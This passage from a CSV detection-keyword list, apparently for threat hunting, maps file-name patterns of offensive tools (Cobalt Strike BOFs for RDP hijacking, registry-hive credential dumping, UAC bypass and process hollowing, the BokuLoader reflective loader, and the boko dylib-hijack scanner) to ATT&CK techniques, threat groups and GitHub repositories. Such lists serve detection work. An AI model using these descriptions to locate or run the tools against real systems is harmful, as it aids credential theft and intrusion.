T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rvrsh3ll/BOF_Collection,1,0,N/A,10,10,480,49,2022-10-16T13:57:18Z,2020-07-16T18:24:55Z -*bof-quser *.*,offensive_tool_keyword,cobaltstrike,Cobalt Strike BOF for quser.exe implementation using Windows API,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/netero1010/Quser-BOF,1,0,N/A,10,10,78,10,2023-03-22T17:07:02Z,2021-04-01T15:19:50Z -*bof-quser.cna*,offensive_tool_keyword,cobaltstrike,Cobalt Strike BOF for quser.exe implementation using Windows API,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/netero1010/Quser-BOF,1,1,N/A,10,10,78,10,2023-03-22T17:07:02Z,2021-04-01T15:19:50Z -*bof-rdphijack*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Beacon Object File (BOF) that uses WinStationConnect API to perform local/remote RDP session hijacking.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/netero1010/RDPHijack-BOF,1,1,N/A,10,3,257,39,2022-07-08T10:14:32Z,2022-07-08T10:14:07Z -*bof-rdphijack*,offensive_tool_keyword,RDPHijack-BOF,BOF - RDPHijack - Cobalt Strike Beacon Object File (BOF) that uses WinStationConnect API to perform local/remote RDP session hijacking.,T1021 - T1021.002 - T1032 - T1055 - T1070 - T1070.006 - T1070.007 - T1574.001,TA0002 - TA0003 - TA0004,N/A,N/A,POST Exploitation tools,https://github.com/netero1010/RDPHijack-BOF,1,1,N/A,N/A,3,257,39,2022-07-08T10:14:32Z,2022-07-08T10:14:07Z -*bof-regsave *,offensive_tool_keyword,cobaltstrike,Dumping SAM / SECURITY / SYSTEM registry hives with a Beacon Object File,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/EncodeGroup/BOF-RegSave,1,0,N/A,10,10,171,29,2020-10-08T17:29:02Z,2020-10-07T13:46:03Z -*BofRunnerOutput*,offensive_tool_keyword,cobaltstrike,A tool to run object files mainly beacon object files (BOF) in .Net.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/nettitude/RunOF,1,1,N/A,10,10,129,22,2023-01-06T15:30:05Z,2022-02-21T13:53:39Z -*BOFs*/SyscallsSpawn/*,offensive_tool_keyword,cobaltstrike,Collection of Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/ajpc500/BOFs,1,1,N/A,10,10,475,115,2022-11-01T14:51:07Z,2020-12-19T11:21:40Z -*Bofs/AssemblyLoader*,offensive_tool_keyword,cobaltstrike,A .NET Runtime for Cobalt Strike's Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/CCob/BOF.NET,1,1,N/A,10,10,557,86,2023-08-13T13:24:00Z,2020-11-02T20:02:55Z -*bof-servicemove *,offensive_tool_keyword,cobaltstrike,New lateral movement technique by abusing Windows Perception Simulation Service to achieve DLL hijacking code execution.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/netero1010/ServiceMove-BOF,1,0,N/A,10,10,223,45,2022-02-23T07:17:38Z,2021-08-16T07:16:31Z -*bof-trustedpath-uacbypass*,offensive_tool_keyword,cobaltstrike,Cobalt Strike beacon object file implementation for trusted path UAC bypass. The target executable will be called without involving cmd.exe by using DCOM object.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/netero1010/TrustedPath-UACBypass-BOF,1,1,N/A,10,10,104,33,2021-08-16T07:49:55Z,2021-08-07T03:40:33Z -*boko.py *,offensive_tool_keyword,boko,boko.py is an application scanner for macOS that searches for and identifies potential dylib hijacking and weak dylib vulnerabilities for application executables as well as scripts an application may use that have the potential to be backdoored,T1195 - T1078 - T1079 - T1574,TA0006 - TA0008,N/A,N/A,Exploitation tools,https://github.com/bashexplode/boko,1,0,N/A,N/A,1,59,12,2021-09-28T22:36:01Z,2020-05-22T21:46:33Z -*bokoscanner.*,offensive_tool_keyword,boko,boko.py is an application scanner for macOS that searches for and identifies potential dylib hijacking and weak dylib vulnerabilities for application executables as well as scripts an application may use that have the potential to be backdoored,T1195 - T1078 - T1079 - T1574,TA0006 - TA0008,N/A,N/A,Exploitation tools,https://github.com/bashexplode/boko,1,1,N/A,N/A,1,59,12,2021-09-28T22:36:01Z,2020-05-22T21:46:33Z -*boku_pe_customMZ*,offensive_tool_keyword,cobaltstrike,A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. and enhance Cobalt Strike's evasion features!,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/boku7/BokuLoader,1,1,N/A,10,10,1068,227,2023-09-08T10:09:19Z,2021-08-15T18:17:28Z -*boku_pe_customPE*,offensive_tool_keyword,cobaltstrike,A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. and enhance Cobalt Strike's evasion features!,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/boku7/BokuLoader,1,1,N/A,10,10,1068,227,2023-09-08T10:09:19Z,2021-08-15T18:17:28Z -*boku_pe_dll*,offensive_tool_keyword,cobaltstrike,A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. and enhance Cobalt Strike's evasion features!,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/boku7/BokuLoader,1,1,N/A,10,10,1068,227,2023-09-08T10:09:19Z,2021-08-15T18:17:28Z -*boku_pe_mask_*,offensive_tool_keyword,cobaltstrike,A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. and enhance Cobalt Strike's evasion features!,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/boku7/BokuLoader,1,1,N/A,10,10,1068,227,2023-09-08T10:09:19Z,2021-08-15T18:17:28Z -*boku_pe_MZ_from_C2Profile*,offensive_tool_keyword,cobaltstrike,A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. and enhance Cobalt Strike's evasion features!,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/boku7/BokuLoader,1,1,N/A,10,10,1068,227,2023-09-08T10:09:19Z,2021-08-15T18:17:28Z -*boku_strrep*,offensive_tool_keyword,cobaltstrike,A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. and enhance Cobalt Strike's evasion features!,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/boku7/BokuLoader,1,1,N/A,10,10,1068,227,2023-09-08T10:09:19Z,2021-08-15T18:17:28Z -*boku7/BokuLoader*,offensive_tool_keyword,cobaltstrike,A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. and enhance Cobalt Strike's evasion features!,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/boku7/BokuLoader,1,1,N/A,10,10,1068,227,2023-09-08T10:09:19Z,2021-08-15T18:17:28Z -*boku7/HOLLOW*,offensive_tool_keyword,cobaltstrike,EarlyBird process hollowing technique (BOF) - Spawns a process in a suspended state. inject shellcode. hijack main thread with APC and execute shellcode,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/boku7/HOLLOW,1,1,N/A,10,10,235,56,2023-03-08T15:51:19Z,2021-07-21T15:58:18Z -*BokuLoader.cna*,offensive_tool_keyword,cobaltstrike,A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. and enhance Cobalt Strike's evasion features!,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/boku7/BokuLoader,1,1,N/A,10,10,1068,227,2023-09-08T10:09:19Z,2021-08-15T18:17:28Z -*BokuLoader.exe*,offensive_tool_keyword,cobaltstrike,A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. and enhance Cobalt Strike's evasion features!,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/boku7/BokuLoader,1,1,N/A,10,10,1068,227,2023-09-08T10:09:19Z,2021-08-15T18:17:28Z -*BokuLoader.x64*,offensive_tool_keyword,cobaltstrike,A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. and enhance Cobalt Strike's evasion features!,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - 